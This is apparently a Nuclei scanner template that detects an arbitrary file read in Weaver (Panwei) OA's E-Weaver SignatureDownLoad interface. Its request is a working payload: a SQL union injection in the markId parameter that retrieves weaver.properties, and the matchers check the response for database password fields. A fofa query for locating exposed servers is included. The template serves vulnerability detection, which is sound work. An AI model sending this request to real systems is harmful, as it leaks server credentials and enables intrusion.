nuclei-templates/http/vulnerabilities/weaver/weaver-signaturedownload-lf...

40 lines
1.2 KiB
YAML
Raw Normal View History

2023-09-13 11:22:00 +00:00
id: weaver-signaturedownload-lfi
info:
name: OA E-Weaver SignatureDownLoad - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="泛微-E-Weaver"
verified: true
tags: ecology,weaver,oa,lfi
http:
- method: GET
path:
- "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DriverClasses"
- "ecology.password"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- "markPicture.jpg"
condition: and
- type: status
status:
- 200